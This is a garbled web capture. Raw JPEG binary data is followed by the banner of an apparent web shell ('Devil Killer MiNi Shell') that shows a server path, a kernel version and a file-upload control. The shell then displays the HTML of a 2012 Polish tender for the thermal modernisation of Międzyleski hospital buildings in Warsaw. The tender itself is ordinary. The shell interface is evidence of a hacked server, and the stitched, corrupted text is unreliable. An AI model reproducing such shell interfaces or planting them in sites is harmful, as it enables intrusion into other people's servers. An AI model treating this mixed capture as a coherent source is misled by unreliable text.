JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120816/176103-N-2012.html

<p class="kh_header"><b>Warszawa: termomodernizacja budynków B, C, D 
Międzyleskiego Szpitala Specjalistycznego w podziale na dwa zadania</b><br>
<b>Numer ogłoszenia: 176103 - 2012; data zamieszczenia: 16.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzyleski Szpital Specjalistyczny w Warszawie , ul. Bursztynowa 2, 04-749 Warszawa, woj. mazowieckie, tel. 022 4735145, faks 022 6131992.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mssw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> termomodernizacja budynków B, C, D 
Międzyleskiego Szpitala Specjalistycznego w podziale na dwa zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest termomodernizacja budynków Międzyleskiego Szpitala Specjalistycznego w Warszawie w podziale na dwa zadania:

Zadanie I
Termomodernizację budynku głównego-część B i C  oraz łączników Miedzyleskiego Szpitala Specjalistycznego w Warszawie.
Lokalizacja  przedmiotu zamówienia : 
Międzyleski Szpital Specjalistyczny w Warszawie 
ul. Bursztynowa 2, 04-749 Warszawa - Międzylesie
dz. nr ewid. 46/2 do 46/11 oraz 59 w obrębie 3-11-47 (262) 
w jednostce ewidencyjnej 146514_8 Warszawa -Wawer.
I. Zakres ogólny przedmiotu zamówienia 
Przedmiot zamówienia obejmuje wykonanie termomodernizacji budynku głównego-część B i C oraz łaczników komunikacyjnych budynku D w zakresie zgodnym z załączonymi przedmiarami robót, a w szczególności wykonanie w ramach: 
1.  Robót wstępnych i przygotowawczych.
1.1. Ogrodzenia, oznakowania i zabezpieczenia terenu budowy oraz jego zagospodarowania  (podłączenie mediów dla potrzeb budowy, urządzenie zaplecza socjalnego, magazynowego itp.). 
1.2.  Zabezpieczenia robót daszkami ochronnymi -dotyczy budynków B i C oraz  wykonanie   rusztowań z  podestami i balustradami wraz z  zabezpieczeniem robót daszkami ochronnymi i osłonami z siatek ochronnych oraz wykonanie instalacji odgromowej na rusztowaniach - dotyczy łączników komunikacyjnych budynku D.
2. Robót podstawowych dotyczących budynków B i C.
2.1. Naprawy kominów, balustrad dachowych, gzymsów, instalacji odgromowej oraz naprawy konstrukcji balkonów - tylko w budynku C.
2.2. Docieplenie dachów wg technologii wykonania podanej w projekcie budowlanym.
2.3. Remontu obróbek blacharskich.
3. Robót podstawowych dotyczących łączników budynku D.
3.1. Demontażu istniejącej elewacji szklanej wraz z wywozem i utylizacją materiałów z rozbiórki.
3.2. Przygotowania podłoża (mycie wodnym agregatem ciśnieniowym, wyrównanie powierzchni i uzupełnienia ubytków zaprawą cementowo-wapienną).
3.3. Docieplenie ścian i ościeży płytami styropianowymi metoda lekko-mokrą, w technologii określonej w projekcie budowlanym.
3.4. Regulacji ustawienia okien.
3.5. Remontu obróbek blacharskich.
3.6. Elewacji budynku  - kolorystyka do ustalenia z Zamawiajacym przed przystąpieniem do robót
4. Robót towarzyszących.
4.1. Opaski wokół łączników budynku D  z betonowych  płyt chodnikowych .
4.2. Uporządkowanie i doprowadzenie do poprzedniego stanu użyteczności terenu budowy.
Przedmiot zamówienia obejmuje ponadto, sporządzenie dokumentacji powykonawczej budowy z naniesionymi zmianami i wykonanie geodezyjnej inwentaryzacji powykonawczej oraz przygotowanie wszystkich dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie obiektu zgodnie z art. 54 i art. 57 ust. 1 i ust. 2 ustawy Prawo budowlane. Warunkiem uznania zakończenia inwestycji i ostatecznego jej rozliczenia jest uzyskanie przez Inwestora  pozwolenia na użytkowanie.
II. Roboty będą wykonywane na podstawie:
       1. Prawomocnego pozwolenia na budowę uzyskanego przez Zamawiającego.
2. Zatwierdzonego projektu budowlanego Projekt budowlany docieplenia ścian zewnętrznych i dachu budynków ABCD Międzyleskiego Szpitala Specjalistycznego w Warszawie.
3. Zakres robót określony jest w przedmiarach robót stanowiących załączonych do SIWZ -  zał.1.
III. Roboty należy wykonywać zgodnie z przepisami zawartymi w:
       1. Ustawie z dnia 7 lipca 1994 r.  Prawo budowlane z późniejszymi zmianami.
      2. Rozporządzeniu Ministra Infrastruktury  z dnia 12 kwietnia 2002 r. w sprawie warunków  
      technicznych, jakim powinny odpowiadać budynki i ich usytuowanie z późniejszymi   
      zmianami.
      3. Ustawie Prawo ochrony środowiska i  ustawie o odpadach   z dnia 27 kwietnia 2001 r. z  
      późniejszymi zmianami. 
       4. Obowiązujących obecnie szczegółowych przepisach prawnych, rozwiązaniach prawno-
      technicznych, w  Polskich Normach oraz wytycznych   w zakresie wykonawstwa budowlanego.
IV. Wymagania w zakresie wykonywanych robót:
1. Roboty należy wykonywać zgodnie z zatwierdzonym projektem budowlanym z należytą 
      starannością oraz zgodnie ze sztuką budowlaną w zakresie niezbędnym do uzyskania pozwolenia na użytkowanie.
2. Wszystkie sprawy techniczne i administracyjne związane z robotami leżą po stronie Wykonawcy.
3. Rozwiązania budowlane i zastosowanie wyrobów i materiałów Wykonawca uzgadnia z Zamawiającym.
4. Wykonawca zabezpieczy teren robót zgodnie z obowiązującymi aktualnie przepisami BHP, p poż  i innymi przepisami w zakresie prawa budowlanego.
5. Wykonawca w trakcie realizacji zobowiązany jest do utrzymywania ładu i porządku na budowie oraz w jej otoczeniu, a w szczególności do należytego zbierania, składowania, transportu i    zagospodarowania lub utylizacji wszelkich zbędnych materiałów, odpadów oraz śmieci jakie pozostają po prowadzonych pracach budowlanych
6. Wszystkie zadania i prace Wykonawca wykona zgodnie z obowiązującymi w tym zakresie przepisami - Prawa Polskiego i Prawa Unii Europejskiej.     
Wszystkie roboty budowlane i montażowe, oraz inne prace należy wykonać  zgodnie z niniejszą  SIWZ i dokumentacją projektową.
V. Terminy wykonania zadania
     Zleceniodawca przewiduje wykonanie przedmiotu zamówienia w okresie do dnia 30.11.2012 r.
VI. Sporządzenie dokumentacji powykonawczej 
     Przedmiot zamówienia obejmuje również sporządzenie, do dnia odbioru końcowego robót, dokumentacji budowy, składającej się z dziennika budowy oraz z przygotowanych do przekazania   
     Zamawiającemu w oddzielnie spiętym zbiorze dokumentów:
     1) kompletnej dokumentacji powykonawczej, 
     2) protokołów  technicznych  odbioru robót,
     3) atestów, certyfikatów  i ew. aprobat technicznych na wbudowane materiały,
     4) wymaganych przepisami szczegółowymi protokołów i zaświadczeń z przeprowadzonych przez  
         wykonawcę badań, sprawdzeń oraz prób,
     5) powykonawczej inwentaryzacji geodezyjnej,
     6)  kart gwarancyjnych  dla wbudowanych wyrobów,
     7) oświadczenia kierownika budowy o zgodności wykonania robót z zatwierdzonym    
          projektem budowlanym, warunkami pozwolenia na budowę, aktualnie obowiązującymi
          przepisami oraz polskimi normami (w przypadku zmian oświadczenia kierownika 
          budowy powinno być poświadczenie przez inspektora nadzoru).
     8) oświadczenia kierownika budowy o doprowadzeniu do należytego stanu i 
          porządku terenu budowy, 
     9)  ze względu na zmiany nie odstępujące w sposób istotny od  zatwierdzonego projektu 
     budowlanego i warunków pozwolenia na budowę, wykonawca dołączy kopie 
     rysunków wchodzących w skład zatwierdzonego projektu budowlanego z naniesionymi   
     zmianami i uzupełniającym opisem technicznym,    
   10) pisemnej gwarancji jakości na wykonany przedmiot umowy.
Wyżej wymieniony zbiór dokumentów winien być opatrzony szczegółowym wykazem  wraz z oświadczeniem, że dostarczona dokumentacja zawiera komplet dokumentów  niezbędnych do uzyskania pozwolenia na użytkowanie obiektu.  

Zadanie II
Termomodernizację budynku D Miedzyleskiego Szpitala Specjalistycznego w Warszawie.
Lokalizacja  przedmiotu zamówienia : 
Międzyleski Szpital Specjalistyczny w Warszawie 
ul. Bursztynowa 2, 04-749 Warszawa - Międzylesie
dz. nr ewid. 46-2 do 46-11 oraz 59 w obrębie 3-11-47 (262) 
w jednostce ewidencyjnej 146514_8 Warszawa -Wawer.
I. Zakres ogólny przedmiotu zamówienia 
Przedmiot zamówienia obejmuje wykonanie termomodernizacji budynku D w zakresie zgodnym z załączonymi przedmiarami robót, a w szczególności wykonanie w ramach : 
1. Robót wstępnych i przygotowawczych.
1.1. Ogrodzenia, oznakowania i zabezpieczenia terenu budowy oraz jego zagospodarowania  (podłączenie  mediów dla potrzeb budowy, urządzenie zaplecza socjalnego, magazynowego itp.).  
1.2. Rusztowań z podestami i balustradami , zabezpieczeń robót daszkami ochronnymi, osłon z siatek ochronnych oraz wykonanie   instalacji odgromowej na rusztowaniach.
2. Robót podstawowych. 
2.1.Demontażu istniejącej elewacji szklanej wraz z wywozem i utylizacją materiałów z  rozbiórki
2.2.Przygotowania podłoża ( mycie wodnym agregatem ciśnieniowym, wyrównanie powierzchni i uzupełnienia ubytków zaprawą cementowo-wapienną,).
2.3. Docieplenia ścian i ościeży płytami styropianowymi metodą lekko-mokrą, w technologii określonej w projekcie budowlanym.
2.4. Regulacji ustawienia okien..
2.5. Remontu obróbek blacharskich.
2.6. Elewacji budynku.
3. Robót towarzyszących.
3.1. Opaski wokół budynku z betonowych płyt chodnikowych.
3.2. Uporządkowanie i doprowadzenie do poprzedniego stanu użyteczności terenu budowy.
Przedmiot zamówienia obejmuje ponadto, sporządzenie dokumentacji powykonawczej budowy z naniesionymi zmianami i wykonanie geodezyjnej inwentaryzacji powykonawczej oraz przygotowanie wszystkich dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie obiektu zgodnie z art. 54 ustawy Prawo budowlane. Warunkiem uznania zakończenia inwestycji i ostatecznego jej rozliczenia jest uzyskanie przez Inwestora pozwolenia na użytkowanie.
II. Roboty będą wykonywane na podstawie:
1. Prawomocnego pozwolenia na budowę uzyskanego przez Zamawiającego.
2. Zatwierdzonego projektu budowlanego Projekt budowlany docieplenia ścian zewnętrznych i dachu budynków ABCD Międzyleskiego Szpitala Specjalistycznego w Warszawie.
3. Zakres robót określony jest w przedmiarach robót stanowiących załączonych do SIWZ -  zał.1.
III. Roboty należy wykonywać zgodnie z przepisami zawartymi w:
       1. Ustawie z dnia 7 lipca 1994 r.  Prawo budowlane z póź. zm.
      2. Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków  technicznych, jakim powinny odpowiadać budynki i ich usytuowanie z póź. zm.
      3. Ustawie Prawo ochrony środowiska i ustawie o odpadach z dnia 27 kwietnia 2001 r. z  póź. zm. 
       4. Obowiązujących obecnie szczegółowych przepisach prawnych, rozwiązaniach prawno-technicznych, w  Polskich Normach oraz wytycznych   w zakresie wykonawstwa budowlanego.
IV. Wymagania w zakresie wykonywanych robót:
1. Roboty należy wykonywać zgodnie z zatwierdzonym projektem budowlanym,  z     
    należytą starannością oraz zgodnie ze sztuką budowlaną w zakresie niezbędnym do uzyskania pozwolenia na użytkowanie.
2. Wszystkie sprawy techniczne i administracyjne związane z robotami  leżą po stronie  
Wykonawcy.
3. Rozwiązania budowlane i zastosowanie wyrobów i materiałów  Wykonawca uzgadnia z Zamawiającym.
4. Wykonawca zabezpieczy teren robót zgodnie z obowiązującymi aktualnie  przepisami BHP, p poż  i innymi przepisami w zakresie Prawa budowlanego.
5. Wykonawca w trakcie realizacji zobowiązany jest do utrzymywania ładu i porządku na budowie  oraz w jej otoczeniu, a w szczególności do należytego zbierania, składowania, transportu i zagospodarowania lub utylizacji wszelkich zbędnych materiałów, odpadów oraz śmieci jakie pozostają po prowadzonych pracach budowlanych.
6. Wszystkie zadania i  prace Wykonawca wykona zgodnie z obowiązującymi w tym zakresie przepisami - Prawa Polskiego i Prawa Unii Europejskiej.           
      Wszystkie roboty budowlane i montażowe, oraz inne prace należy wykonać zgodnie z niniejszą       
      SIWZ i dokumentacją projektową.
V. Terminy wykonania zadania
     Zleceniodawca przewiduje wykonanie przedmiotu zamówienia w okresie do dnia 30.11.2012 r.
VI. Sporządzenie dokumentacji powykonawczej 
     Przedmiot zamówienia obejmuje również sporządzenie, do dnia odbioru końcowego robót, dokumentacji budowy, składającej się z dziennika budowy oraz z przygotowanych do przekazania   
     Zamawiającemu w oddzielnie spiętym zbiorze dokumentów:
     1) kompletnej dokumentacji powykonawczej, 
     2) protokołów technicznych odbioru robót,
     3) atestów, certyfikatów i ew. aprobat technicznych na wbudowane materiały,
     4) wymaganych przepisami szczegółowymi protokołów i zaświadczeń z    
         przeprowadzonych przez wykonawcę badań, sprawdzeń oraz prób,
     5) powykonawczej inwentaryzacji geodezyjnej,
     6)  kart gwarancyjnych  dla wbudowanych wyrobów,
     7) oświadczenia kierownika budowy o zgodności wykonania robót z zatwierdzonym  projektem budowlanym, warunkami pozwolenia na budowę, aktualnie obowiązującymi przepisami oraz polskimi normami (w przypadku zmian oświadczenia kierownika budowy powinno być poświadczenie przez inspektora nadzoru).
     8) oświadczenia kierownika budowy o doprowadzeniu do należytego stanu i 
          porządku terenu budowy, 
     9)  ze względu na zmiany nie odstępujące w sposób istotny od  zatwierdzonego projektu budowlanego i warunków pozwolenia na budowę, wykonawca dołączy kopie 
     rysunków wchodzących w skład zatwierdzonego projektu budowlanego z naniesionymi  zmianami i uzupełniającym opisem technicznym,    
   10) pisemnej gwarancji jakości na wykonany przedmiot umowy.
      Wyżej wymieniony zbiór dokumentów winien być opatrzony szczegółowym wykazem wraz z oświadczeniem, że dostarczona dokumentacja zawiera komplet dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie obiektu.  
 
V.  Zaleca się, aby Wykonawca przed przygotowaniem oferty, zapoznał się z miejscem robót budowlanych tj.: poprzez dokonanie wizji lokalnej, zadaniem wszelkich pytań związanych z realizacją zamówienia. Dokumentacja projektowa jest do wglądu w siedzibie Zamawiającego (dział Techniczny), za uprzednim powiadomieniem. 

VI. Projekt umowy stanowiący Załącznik Nr 1 do siwz jest integralną część niniejszej dokumentacji i 
zapisy w niej zawarte traktuje się jako warunki udzielenia zamówienia.
VII. Zamawiający dopuszcza podwykonawców branżowych z zastrzeżeniem wykonania robót budowlanych, które muszą być wykonane  przez Wykonawcę. W takim przypadku Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie I
16.000,00 zł  słownie zł: szesnaście tysięcy złotych     
Zadanie II
15.000,00 zł  słownie zł: piętnaście tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie I 
Za odpowiedni rodzaj roboty budowlanej w zadaniu I Zamawiający uznaje termomodernizację obiektu użyteczności publicznej. Za odpowiednią wartość Zamawiający uznaje min 600.000,00 PLN
Zamawiający będzie oceniał:
- minimum 2 roboty budowlane odpowiadające wymaganiom określonym wyżej przez Zamawiającego - spełnia  
- brak minimum 2 robót budowlanych odpowiadających wymaganiom określonym wyżej przez Zamawiającego - nie spełnia  


Zadanie II:
Za odpowiedni rodzaj roboty budowlanej w zadaniu II Zamawiający uznaje termomodernizację obiektu uzyteczności publicznej. Za odpowiednią wartość Zamawiający uznaje min 500.000,00 PLN
Zamawiający będzie oceniał:
- minimum 2 roboty budowlane odpowiadające wymaganiom określonym wyżej przez Zamawiającego - spełnia  
- brak minimum 2 robót budowlanych odpowiadających wymaganiom określonym wyżej przez Zamawiającego - nie spełnia  

Wykaz robót budowlanych należy przedstawić dla każdego zadania osobno. Jeśli wykonawca przystępuje do więcej niż jednego zadania możliwe jest przedstawienie wykazu robót budowlanych łącznie dla oferowanych zadań, pod warunkiem, że roboty budowlane zostały zrealizowane zgodnie z opisanym powyżej na poszczególne zadania przedmiotem zamówienia oraz łączna wartość tych robót budowlanych odpowiada łącznej wartości oferowanych zadań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
Zadanie I
- wykonawca winien wykazać się wysokością posiadanych środków lub zdolnością kredytową w wysokości co najmniej 600.000,00 zł 
- posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokość sumy gwarancyjnej nie mniejszej niż 2.000.000,00 zł, a okres ubezpieczenia obejmować musi czas realizowania zamówienia przez Wykonawcę.
Zamawiający będzie je oceniał:
- posiada środki finansowe lub zdolność kredytową w wysokości minimum 600.000,00 zł - spełnia
- posiada środki finansowe lub zdolność kredytową w wysokości mniejszej niż 600.000,00 zł - nie spełnia
- za spełnienie warunku ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, Zamawiający uzna posiadanie przez Wykonawcę polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Zadanie II
- wykonawca winien wykazać się wysokością posiadanych środków lub zdolnością kredytową w wysokości co najmniej 500.000,00 zł 
- posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokość sumy gwarancyjnej nie mniejszej niż 2.000.000,00 zł, a okres ubezpieczenia obejmować musi czas realizowania zamówienia przez Wykonawcę.
Zamawiający będzie je oceniał:
- posiada środki finansowe lub zdolność kredytową w wysokości minimum 500.000,00 zł - spełnia
- posiada środki finansowe lub zdolność kredytową w wysokości mniejszej niż 500.000,00 zł - nie spełnia
- za spełnienie warunku ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, Zamawiający uzna posiadanie przez Wykonawcę polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Jeśli wykonawca przystępuje do więcej niż jednego zadania możliwe jest przedstawienie posiadania środków finansowych lub zdolności kredytowej oraz ubezpieczenia od odpowiedzialności cywilnej   łącznie dla oferowanych zadań, pod warunkiem, że łączna wartość posiadanych środków finansowych lub zdolności kredytowej oraz ubezpieczania od odpowiedzialności cywilnej   odpowiada łącznej wartości oferowanych zadań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

